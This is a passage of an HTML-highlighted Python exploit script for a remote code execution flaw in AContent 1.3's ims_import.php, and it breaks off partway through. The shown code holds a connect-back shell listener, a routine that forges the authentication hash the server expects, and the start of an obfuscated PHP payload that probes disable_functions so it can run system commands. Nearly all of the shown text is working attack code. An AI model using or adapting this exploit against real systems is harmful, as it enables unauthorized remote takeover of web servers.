id=\"crayon-591b7aecb0fa1726489437-11\"><span class=\"crayon-e\">import <\/span><span class=\"crayon-e\">termios<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-591b7aecb0fa1726489437-12\"><span class=\"crayon-e\">import <\/span><span class=\"crayon-e\">hashlib<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-591b7aecb0fa1726489437-13\"><span class=\"crayon-e\">import <\/span><span class=\"crayon-e\">requests<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-591b7aecb0fa1726489437-14\"><span class=\"crayon-e\">import <\/span><span class=\"crayon-e\">threading<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-591b7aecb0fa1726489437-15\"><span class=\"crayon-e\">import <\/span><span class=\"crayon-e\">SocketServer<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-591b7aecb0fa1726489437-16\"><span class=\"crayon-e\">from <\/span><span class=\"crayon-e\">cStringIO <\/span><span class=\"crayon-e\">import <\/span><span class=\"crayon-v\">StringIO<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-591b7aecb0fa1726489437-17\">&nbsp;<\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-591b7aecb0fa1726489437-18\"><span class=\"crayon-p\"># interactive connectback listener<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-591b7aecb0fa1726489437-19\"><span class=\"crayon-t\">class<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">connect_back_shell<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">SocketServer<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">BaseRequestHandler<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-o\">:<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-591b7aecb0fa1726489437-20\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-s\">&#8220;&#8221;<\/span><span class=\"crayon-s\">&#8220;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-591b7aecb0fa1726489437-21\"><span class=\"crayon-s\">&nbsp;&nbsp;&nbsp;&nbsp;our interactive, shell like client<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-591b7aecb0fa1726489437-22\"><span class=\"crayon-s\">&nbsp;&nbsp;&nbsp;&nbsp;&#8220;<\/span><span class=\"crayon-s\">&#8220;&#8221;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-591b7aecb0fa1726489437-23\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-e\">def <\/span><span class=\"crayon-e\">handle<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-r\">self<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-o\">:<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-591b7aecb0fa1726489437-24\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">s<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-r\">self<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">request<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-591b7aecb0fa1726489437-25\"><span class=\"crayon-e\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">old_settings<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">termios<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">tcgetattr<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-cn\">0<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-591b7aecb0fa1726489437-26\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-st\">try<\/span><span class=\"crayon-o\">:<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-591b7aecb0fa1726489437-27\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">c<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-t\">True<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-591b7aecb0fa1726489437-28\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-r\">self<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">close<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">0<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-591b7aecb0fa1726489437-29\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-st\">while<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-st\">not<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-r\">self<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">close<\/span><span class=\"crayon-o\">:<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-591b7aecb0fa1726489437-30\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-st\">for<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-i\">i<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-st\">in<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">select<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">select<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-sy\">[<\/span><span class=\"crayon-cn\">0<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">s<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">fileno<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">[<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">[<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">0<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">[<\/span><span class=\"crayon-cn\">0<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-o\">:<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-591b7aecb0fa1726489437-31\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">c<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">os<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">read<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">i<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">2048<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-591b7aecb0fa1726489437-32\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-st\">if<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">c<\/span><span class=\"crayon-o\">:<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-591b7aecb0fa1726489437-33\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">os<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">write<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">s<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">fileno<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-st\">if<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">i<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">==<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">0<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-st\">else<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">1<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">c<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-591b7aecb0fa1726489437-34\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-st\">if<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">i<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">==<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">0<\/span><span class=\"crayon-o\">:<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-591b7aecb0fa1726489437-35\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-st\">if<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8220;exit&#8221;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-st\">in<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-i\">c<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-st\">or<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8220;quit&#8221;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-st\">in<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">c<\/span><span class=\"crayon-o\">:<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-591b7aecb0fa1726489437-36\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-r\">self<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">terminate<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-591b7aecb0fa1726489437-37\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">s<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">close<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-591b7aecb0fa1726489437-38\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-e\">except <\/span><span class=\"crayon-v\">KeyboardInterrupt<\/span><span class=\"crayon-o\">:<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-591b7aecb0fa1726489437-39\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-st\">return<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-591b7aecb0fa1726489437-40\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-st\">finally<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-591b7aecb0fa1726489437-41\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">termios<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">tcsetattr<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-cn\">0<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">termios<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">TCSADRAIN<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">old_settings<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-h\">&nbsp;&nbsp;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-591b7aecb0fa1726489437-42\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-st\">return<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-591b7aecb0fa1726489437-43\"><span class=\"crayon-h\">&nbsp;&nbsp;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-591b7aecb0fa1726489437-44\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-e\">def <\/span><span class=\"crayon-e\">terminate<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-r\">self<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-o\">:<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-591b7aecb0fa1726489437-45\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-r\">self<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">close<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">1<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-591b7aecb0fa1726489437-46\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-r\">self<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">server<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">shutdown<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-591b7aecb0fa1726489437-47\">&nbsp;<\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-591b7aecb0fa1726489437-48\"><span class=\"crayon-t\">class<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">threaded_tcp_server<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">SocketServer<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">ThreadingMixIn<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">SocketServer<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">TCPServer<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-o\">:<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-591b7aecb0fa1726489437-49\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-e\">pass<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-591b7aecb0fa1726489437-50\">&nbsp;<\/div>\n<div class=\"crayon-line\" id=\"crayon-591b7aecb0fa1726489437-51\"><span class=\"crayon-e\">def <\/span><span class=\"crayon-e\">banner<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-o\">:<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-591b7aecb0fa1726489437-52\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-i\">print<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8220;nt| &#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212; |&#8221;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-591b7aecb0fa1726489437-53\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-i\">print<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8220;t| AContent &lt;= 1.3 ims_import.php Remote Code Execution Vulnerability |&#8221;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-591b7aecb0fa1726489437-54\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-i\">print<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8220;t| &#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8211;|n&#8221;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-591b7aecb0fa1726489437-55\">&nbsp;<\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-591b7aecb0fa1726489437-56\"><span class=\"crayon-e\">def <\/span><span class=\"crayon-e\">_get_hashed_password<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">token<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-o\">:<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-591b7aecb0fa1726489437-57\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-s\">&#8220;&#8221;<\/span><span class=\"crayon-s\">&#8220;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-591b7aecb0fa1726489437-58\"><span class=\"crayon-s\">&nbsp;&nbsp;&nbsp;&nbsp;takes advantage of the authentication weakness and generates <\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-591b7aecb0fa1726489437-59\"><span class=\"crayon-s\">&nbsp;&nbsp;&nbsp;&nbsp;the hash as the server expects it, see client side code<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-591b7aecb0fa1726489437-60\"><span class=\"crayon-s\">&nbsp;&nbsp;&nbsp;&nbsp;&#8220;<\/span><span class=\"crayon-s\">&#8220;&#8221;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-591b7aecb0fa1726489437-61\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">s2<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">hashlib<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">sha1<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-591b7aecb0fa1726489437-62\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">s1<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">hashlib<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">sha1<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-591b7aecb0fa1726489437-63\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">s1<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">update<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">password<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-591b7aecb0fa1726489437-64\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">hash_stage_1<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">s1<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">hexdigest<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-591b7aecb0fa1726489437-65\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">s2<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">update<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-s\">&#8220;%s%s&#8221;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">%<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">hash_stage_1<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">token<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-591b7aecb0fa1726489437-66\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-st\">return<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">s2<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">hexdigest<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-591b7aecb0fa1726489437-67\">&nbsp;<\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-591b7aecb0fa1726489437-68\"><span class=\"crayon-e\">def <\/span><span class=\"crayon-e\">_build_php_code<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-o\">:<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-591b7aecb0fa1726489437-69\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">phpkode<\/span><span class=\"crayon-h\">&nbsp;&nbsp;<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-s\">&#8220;&#8221;<\/span><span class=\"crayon-s\">&#8220;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-591b7aecb0fa1726489437-70\"><span class=\"crayon-s\">&nbsp;&nbsp;&nbsp;&nbsp;@set_time_limit(0); @ignore_user_abort(1); @ini_set(&#8216;max_execution_time&#8217;,0);&#8221;<\/span><span class=\"crayon-s\">&#8220;&#8221;<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-591b7aecb0fa1726489437-71\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">phpkode<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">+=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-s\">&#8220;&#8221;<\/span><span class=\"crayon-s\">&#8220;$dis=@ini_get(&#8216;disable_functions&#8217;);&#8221;<\/span><span class=\"crayon-s\">&#8220;&#8221;<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-591b7aecb0fa1726489437-72\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">phpkode<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">+=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-s\">&#8220;&#8221;<\/span><span class=\"crayon-s\">&#8220;if(!empty($dis)){$dis=preg_replace(&#8216;\/[, ]+\/&#8217;, &#8216;,&#8217;, $dis);$dis=explode(&#8216;,&#8217;, $dis);&#8221;<\/span><span class=\"crayon-s\">&#8220;&#8221;<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-591b7aecb0fa1726489437-73\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">phpkode<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">+=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-s\">&#8220;&#8221;<\/span><span class=\"crayon-s\">&#8220;$dis=array_map(&#8216;trim&#8217;, $dis);}else{$dis=array();} &#8220;<\/span><span class=\"crayon-s\">&#8220;&#8221;<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-591b7aecb0fa1726489437-74\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">phpkode<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">+=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-s\">&#8220;&#8221;<\/span><span class=\"crayon-s\">&#8220;if(!function_exists(&#8216;LcNIcoB&#8217;)){function LcNIcoB($c){ &#8220;<\/span><span class=\"crayon-s\">&#8220;&#8221;<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-591b7aecb0fa1726489437-75\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">phpkode<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">+=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-s\">&#8220;&#8221;<\/span><span class=\"crayon-s\">&#8220;global $dis;if (FALSE !== strpos(strtolower(PHP_OS), &#8216;win&#8217; )) {$c=$c.&#8221;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">2<\/span><span class=\"crayon-o\">&gt;<\/span><span class=\"crayon-o\">&amp;<\/span><span class=\"crayon-cn\">1<\/span><span class=\"crayon-sy\"><\/span><span class=\"crayon-sy\"><\/span><span class=\"crayon-i\">n<\/span><span class=\"crayon-s\">&#8220;;} &#8220;<\/span><span class=\"crayon-s\">&#8220;&#8221;<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-591b7aecb0fa1726489437-76\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">phpkode<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">+=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-s\">&#8220;&#8221;<\/span><span class=\"crayon-s\">&#8220;$imARhD=&#8217;is_callable&#8217;;$kqqI=&#8217;in_array&#8217;;&#8221;<\/span><span class=\"crayon-s\">&#8220;&#8221;<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-591b7aecb0fa1726489437-77\"><span 